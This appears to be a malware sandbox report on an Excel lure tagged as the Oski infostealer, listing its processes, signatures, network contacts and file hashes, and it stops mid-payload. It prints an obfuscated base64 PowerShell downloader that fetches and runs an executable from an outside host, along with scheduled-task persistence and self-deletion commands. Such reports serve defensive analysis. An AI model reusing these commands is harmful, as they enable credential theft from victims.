"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BqppCjWADhQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2694.tmp"

C:\Users\Admin\AppData\Local\Temp\lzzn.exe

"C:\Users\Admin\AppData\Local\Temp\lzzn.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 556 & erase C:\Users\Admin\AppData\Local\Temp\lzzn.exe & RD /S /Q C:\\ProgramData\\123557748826003\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 556

Network

Country Destination Domain Proto
N/A 46.183.223.34:80 46.183.223.34 tcp
N/A 185.212.131.198:80 185.212.131.198 tcp

Files

memory/1304-60-0x000000002FFC1000-0x000000002FFC4000-memory.dmp

memory/1304-61-0x0000000071711000-0x0000000071713000-memory.dmp

memory/1304-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1628-63-0x0000000000000000-mapping.dmp

memory/760-65-0x0000000075551000-0x0000000075553000-memory.dmp

memory/760-64-0x0000000000000000-mapping.dmp

memory/760-66-0x0000000000B00000-0x0000000000B01000-memory.dmp

memory/760-67-0x00000000048A0000-0x00000000048A1000-memory.dmp

memory/760-68-0x0000000004860000-0x0000000004861000-memory.dmp

memory/760-69-0x0000000004862000-0x0000000004863000-memory.dmp

memory/760-70-0x00000000024D0000-0x00000000024D1000-memory.dmp

memory/760-71-0x0000000005240000-0x0000000005241000-memory.dmp

memory/760-74-0x0000000005640000-0x0000000005641000-memory.dmp

memory/760-79-0x00000000056B0000-0x00000000056B1000-memory.dmp

memory/760-80-0x00000000061F0000-0x00000000061F1000-memory.dmp

memory/760-87-0x0000000006170000-0x0000000006171000-memory.dmp

memory/760-88-0x000000007EF30000-0x000000007EF31000-memory.dmp

memory/760-89-0x0000000006340000-0x0000000006341000-memory.dmp

memory/760-90-0x0000000000A10000-0x0000000000A11000-memory.dmp

memory/824-92-0x0000000000000000-mapping.dmp

memory/824-93-0x0000000000B70000-0x0000000000B71000-memory.dmp

memory/824-95-0x0000000004890000-0x0000000004891000-memory.dmp

memory/824-96-0x0000000000800000-0x0000000000813000-memory.dmp

memory/824-97-0x0000000007EC0000-0x0000000007F53000-memory.dmp

memory/824-98-0x00000000048D0000-0x0000000004904000-memory.dmp

memory/1572-99-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\tmp2694.tmp

MD5 816866332859effe0b726cab9417f928
SHA1 fd7545796356c7fb8f056ab12c077a530ae08d34
SHA256 d04778d37af60e0679858c419a56368865df651d72ee38de73812d363cdc3e7d
SHA512 40460fb3d3b5e6edbbed45929b86919e9c1451d25a5cf6ea29ee92097e752246617bb6249b6c8580a7e5bec9d18a0c10a6abda6d98ce5fe4c439d6c6c6754aba

memory/556-101-0x0000000000400000-0x0000000000438000-memory.dmp

memory/556-102-0x000000000040717B-mapping.dmp

memory/556-104-0x0000000000400000-0x0000000000438000-memory.dmp

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\ProgramData\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\ProgramData\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1784-111-0x0000000000000000-mapping.dmp

memory/364-112-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-08-06 13:54

Reported

2021-08-06 13:59

Platform

win10v20210410

Max time kernel

300s

Max time network

302s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SAMPLE ORDER .xls"

Signatures

Oski

infostealer oski

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4724 set thread context of 5104 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\lzzn.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4036 wrote to memory of 4064 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\cmd.exe
PID 4036 wrote to memory of 4064 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\cmd.exe
PID 4064 wrote to memory of 3936 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4064 wrote to memory of 3936 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 4724 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 3936 wrote to memory of 4724 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 3936 wrote to memory of 4724 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 4724 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\schtasks.exe
PID 4724 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\schtasks.exe
PID 4724 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\schtasks.exe
PID 4724 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 4724 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 4724 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 4724 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 4724 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 4724 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 4724 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 4724 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 4724 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 5104 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\cmd.exe
PID 5104 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\lzzn.exe C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4284 wrote to memory of 4328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4284 wrote to memory of 4328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SAMPLE ORDER .xls"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c pO^W^Ers^He^LL -e WwBzAFkAUwBUAEUAbQAuAHQARQB4AFQALgBFAE4AQwBPAEQASQBOAGcAXQA6ADoAdQBOAGkAQwBvAGQAZQAuAEcARQB0AHMAdAByAGkAbgBHACgAWwBTAHkAUwB0AGUAbQAuAGMATwBuAHYARQBSAFQAXQA6ADoAZgByAE8ATQBCAEEAUwBlADYANABTAFQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcASQBBAGIAZwBCAHcAQQBIAGMAQQBkAEEAQgBxAEEASABrAEEAYwB3AEIAeQBBAEcAbwBBAGQAUQBCAGoAQQBIAGMAQQBaAGcAQgBzAEEARwBvAEEAYQB3AEIAbQBBAEcAcwBBAGMAUQBCAGkAQQBIAFkAQQBkAGcAQgAzAEEAQwBBAEEASwBBAEEAZwBBAEMAUQBBAGEAUQBCAHQAQQBIAFkAQQBaAFEAQgBqAEEASABRAEEAYwB3AEIAagBBAEgARQBBAFkAUQBCADMAQQBHADAAQQBkAHcAQgBqAEEARwBnAEEAYQBBAEIAawBBAEgAVQBBAEkAQQBBAHMAQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwB3AEIAbgBBAEgASQBBAGQAdwBCAGkAQQBIAE0AQQBjAGcAQgBtAEEARwBzAEEAWgBBAEIAcgBBAEcAYwBBAGMAdwBCADAAQQBHADQAQQBhAEEAQgB2AEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAVQBnAEIAVQBBAEMAMABBAGIAUQBCAHYAQQBFAFEAQQBWAFEAQgBzAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAFYAQQBCAHoAQQBIAFEAQQBjAGcAQgBCAEEARQA0AEEAVQB3AEIAbQBBAEUAVQBBAGMAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAUQBRAEIAUwBBAEgAUQBBAEwAUQBCAEMAQQBFAGsAQQBkAEEAQgB6AEEARgBRAEEAVQBnAEIAQgBBAEUANABBAGMAdwBCAEcAQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAYwB3AEIAUABBAEYAVQBBAGMAZwBCAGoAQQBHAFUAQQBJAEEAQQBrAEEARwBrAEEAYgBRAEIAMgBBAEcAVQBBAFkAdwBCADAAQQBIAE0AQQBZAHcAQgB4AEEARwBFAEEAZAB3AEIAdABBAEgAYwBBAFkAdwBCAG8AQQBHAGcAQQBaAEEAQgAxAEEAQwBBAEEATABRAEIARQBBAEUAVQBBAGMAdwBCADAAQQBHAGsAQQBUAGcAQgBoAEEASABRAEEAYQBRAEIAUABBAEcANABBAEkAQQBBAGsAQQBIAGMAQQBhAEEAQgB6AEEARwBjAEEAYwBnAEIAMwBBAEcASQBBAGMAdwBCAHkAQQBHAFkAQQBhAHcAQgBrAEEARwBzAEEAWgB3AEIAegBBAEgAUQBBAGIAZwBCAG8AQQBHADgAQQBPAHcAQQBnAEEAQwBZAEEASQBBAEEAawBBAEgAYwBBAGEAQQBCAHoAQQBHAGMAQQBjAGcAQgAzAEEARwBJAEEAYwB3AEIAeQBBAEcAWQBBAGEAdwBCAGsAQQBHAHMAQQBaAHcAQgB6AEEASABRAEEAYgBnAEIAbwBBAEcAOABBAE8AdwBBAGcAQQBIADAAQQBkAEEAQgB5AEEASABrAEEAZQB3AEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEAUABRAEEAawBBAEUAVQBBAGIAZwBCAFcAQQBEAG8AQQBkAEEAQgBGAEEARwAwAEEAYwBBAEEAcgBBAEMAYwBBAFgAQQBCAHMAQQBIAG8AQQBlAGcAQgB1AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBpAEEARwA0AEEAYwBBAEIAMwBBAEgAUQBBAGEAZwBCADUAQQBIAE0AQQBjAGcAQgBxAEEASABVAEEAWQB3AEIAMwBBAEcAWQBBAGIAQQBCAHEAQQBHAHMAQQBaAGcAQgByAEEASABFAEEAWQBnAEIAMgBBAEgAWQBBAGQAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBAHoAQQBDADQAQQBNAHcAQQAwAEEAQwA4AEEAUgB3AEIANABBAEcATQBBAFEAUQBCAGsAQQBHAGsAQQBlAGcAQgBXAEEARwA0AEEAVABRAEIAdQBBAEQARQBBAFUAZwBCAEMAQQBFADgAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHkAQQBHAHMAQQBaAGcAQgBwAEEARwBvAEEAYwBnAEIAdQBBAEgAZwBBAGUAUQBCADUAQQBHAFEAQQBZAGcAQgB0AEEASABjAEEAWQB3AEIAawBBAEcAdwBBAGIAZwBCADUAQQBIAGsAQQBkAFEAQgBpAEEARwBVAEEAYQBBAEIAaQBBAEQAcwBBAEQAUQBBAEsAQQBHAEkAQQBiAGcAQgB3AEEASABjAEEAZABBAEIAcQBBAEgAawBBAGMAdwBCAHkAQQBHAG8AQQBkAFEAQgBqAEEASABjAEEAWgBnAEIAcwBBAEcAbwBBAGEAdwBCAG0AQQBHAHMAQQBjAFEAQgBpAEEASABZAEEAZABnAEIAMwBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBPAEEAQQB6AEEAQwA0AEEATQBnAEEAeQBBAEQATQBBAEwAZwBBAHoAQQBEAFEAQQBMAHcAQgBIAEEASABnAEEAWQB3AEIAQgBBAEcAUQBBAGEAUQBCADYAQQBGAFkAQQBiAGcAQgBOAEEARwA0AEEATQBRAEIAUwBBAEUASQBBAFQAdwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHUAQQBIAEEAQQBkAHcAQgAwAEEARwBvAEEAZQBRAEIAegBBAEgASQBBAGEAZwBCADEAQQBHAE0AQQBkAHcAQgBtAEEARwB3AEEAYQBnAEIAcgBBAEcAWQBBAGEAdwBCAHgAQQBHAEkAQQBkAGcAQgAyAEEASABjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEATgBBAEEAMgBBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQATQBBAE4AQQBBAHYAQQBFAGMAQQBlAEEAQgBqAEEARQBFAEEAWgBBAEIAcABBAEgAbwBBAFYAZwBCAHUAQQBFADAAQQBiAGcAQQB4AEEARgBJAEEAUQBnAEIAUABBAEMANABBAFoAUQBCADQAQQBHAFUAQQBKAHcAQQBnAEEAQwBRAEEAYwBnAEIAcgBBAEcAWQBBAGEAUQBCAHEAQQBIAEkAQQBiAGcAQgA0AEEASABrAEEAZQBRAEIAawBBAEcASQBBAGIAUQBCADMAQQBHAE0AQQBaAEEAQgBzAEEARwA0AEEAZQBRAEIANQBBAEgAVQBBAFkAZwBCAGwAQQBHAGcAQQBZAGcAQQA3AEEAQQAwAEEAQwBnAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABJAGUAWAA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

pOWErsHeLL -e WwBzAFkAUwBUAEUAbQAuAHQARQB4AFQALgBFAE4AQwBPAEQASQBOAGcAXQA6ADoAdQBOAGkAQwBvAGQAZQAuAEcARQB0AHMAdAByAGkAbgBHACgAWwBTAHkAUwB0AGUAbQAuAGMATwBuAHYARQBSAFQAXQA6ADoAZgByAE8ATQBCAEEAUwBlADYANABTAFQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcASQBBAGIAZwBCAHcAQQBIAGMAQQBkAEEAQgBxAEEASABrAEEAYwB3AEIAeQBBAEcAbwBBAGQAUQBCAGoAQQBIAGMAQQBaAGcAQgBzAEEARwBvAEEAYQB3AEIAbQBBAEcAcwBBAGMAUQBCAGkAQQBIAFkAQQBkAGcAQgAzAEEAQwBBAEEASwBBAEEAZwBBAEMAUQBBAGEAUQBCAHQAQQBIAFkAQQBaAFEAQgBqAEEASABRAEEAYwB3AEIAagBBAEgARQBBAFkAUQBCADMAQQBHADAAQQBkAHcAQgBqAEEARwBnAEEAYQBBAEIAawBBAEgAVQBBAEkAQQBBAHMAQQBDAEEAQQBKAEEAQgAzAEEARwBnAEEAYwB3AEIAbgBBAEgASQBBAGQAdwBCAGkAQQBIAE0AQQBjAGcAQgBtAEEARwBzAEEAWgBBAEIAcgBBAEcAYwBBAGMAdwBCADAAQQBHADQAQQBhAEEAQgB2AEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAVQBnAEIAVQBBAEMAMABBAGIAUQBCAHYAQQBFAFEAQQBWAFEAQgBzAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAFYAQQBCAHoAQQBIAFEAQQBjAGcAQgBCAEEARQA0AEEAVQB3AEIAbQBBAEUAVQBBAGMAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAUQBRAEIAUwBBAEgAUQBBAEwAUQBCAEMAQQBFAGsAQQBkAEEAQgB6AEEARgBRAEEAVQBnAEIAQgBBAEUANABBAGMAdwBCAEcAQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAYwB3AEIAUABBAEYAVQBBAGMAZwBCAGoAQQBHAFUAQQBJAEEAQQBrAEEARwBrAEEAYgBRAEIAMgBBAEcAVQBBAFkAdwBCADAAQQBIAE0AQQBZAHcAQgB4AEEARwBFAEEAZAB3AEIAdABBAEgAYwBBAFkAdwBCAG8AQQBHAGcAQQBaAEEAQgAxAEEAQwBBAEEATABRAEIARQBBAEUAVQBBAGMAdwBCADAAQQBHAGsAQQBUAGcAQgBoAEEASABRAEEAYQBRAEIAUABBAEcANABBAEkAQQBBAGsAQQBIAGMAQQBhAEEAQgB6AEEARwBjAEEAYwBnAEIAMwBBAEcASQBBAGMAdwBCAHkAQQBHAFkAQQBhAHcAQgBrAEEARwBzAEEAWgB3AEIAegBBAEgAUQBBAGIAZwBCAG8AQQBHADgAQQBPAHcAQQBnAEEAQwBZAEEASQBBAEEAawBBAEgAYwBBAGEAQQBCAHoAQQBHAGMAQQBjAGcAQgAzAEEARwBJAEEAYwB3AEIAeQBBAEcAWQBBAGEAdwBCAGsAQQBHAHMAQQBaAHcAQgB6AEEASABRAEEAYgBnAEIAbwBBAEcAOABBAE8AdwBBAGcAQQBIADAAQQBkAEEAQgB5AEEASABrAEEAZQB3AEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEAUABRAEEAawBBAEUAVQBBAGIAZwBCAFcAQQBEAG8AQQBkAEEAQgBGAEEARwAwAEEAYwBBAEEAcgBBAEMAYwBBAFgAQQBCAHMAQQBIAG8AQQBlAGcAQgB1AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBpAEEARwA0AEEAYwBBAEIAMwBBAEgAUQBBAGEAZwBCADUAQQBIAE0AQQBjAGcAQgBxAEEASABVAEEAWQB3AEIAMwBBAEcAWQBBAGIAQQBCAHEAQQBHAHMAQQBaAGcAQgByAEEASABFAEEAWQBnAEIAMgBBAEgAWQBBAGQAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATQB3AEEAdQBBAEQASQBBAE0AZwBBAHoAQQBDADQAQQBNAHcAQQAwAEEAQwA4AEEAUgB3AEIANABBAEcATQBBAFEAUQBCAGsAQQBHAGsAQQBlAGcAQgBXAEEARwA0AEEAVABRAEIAdQBBAEQARQBBAFUAZwBCAEMAQQBFADgAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHkAQQBHAHMAQQBaAGcAQgBwAEEARwBvAEEAYwBnAEIAdQBBAEgAZwBBAGUAUQBCADUAQQBHAFEAQQBZAGcAQgB0AEEASABjAEEAWQB3AEIAawBBAEcAdwBBAGIAZwBCADUAQQBIAGsAQQBkAFEAQgBpAEEARwBVAEEAYQBBAEIAaQBBAEQAcwBBAEQAUQBBAEsAQQBHAEkAQQBiAGcAQgB3AEEASABjAEEAZABBAEIAcQBBAEgAawBBAGMAdwBCAHkAQQBHAG8AQQBkAFEAQgBqAEEASABjAEEAWgBnAEIAcwBBAEcAbwBBAGEAdwBCAG0AQQBHAHMAQQBjAFEAQgBpAEEASABZAEEAZABnAEIAMwBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBPAEEAQQB6AEEAQwA0AEEATQBnAEEAeQBBAEQATQBBAEwAZwBBAHoAQQBEAFEAQQBMAHcAQgBIAEEASABnAEEAWQB3AEIAQgBBAEcAUQBBAGEAUQBCADYAQQBGAFkAQQBiAGcAQgBOAEEARwA0AEEATQBRAEIAUwBBAEUASQBBAFQAdwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgASQBBAGEAdwBCAG0AQQBHAGsAQQBhAGcAQgB5AEEARwA0AEEAZQBBAEIANQBBAEgAawBBAFoAQQBCAGkAQQBHADAAQQBkAHcAQgBqAEEARwBRAEEAYgBBAEIAdQBBAEgAawBBAGUAUQBCADEAQQBHAEkAQQBaAFEAQgBvAEEARwBJAEEATwB3AEEATgBBAEEAbwBBAFkAZwBCAHUAQQBIAEEAQQBkAHcAQgAwAEEARwBvAEEAZQBRAEIAegBBAEgASQBBAGEAZwBCADEAQQBHAE0AQQBkAHcAQgBtAEEARwB3AEEAYQBnAEIAcgBBAEcAWQBBAGEAdwBCAHgAQQBHAEkAQQBkAGcAQgAyAEEASABjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEATgBBAEEAMgBBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQATQBBAE4AQQBBAHYAQQBFAGMAQQBlAEE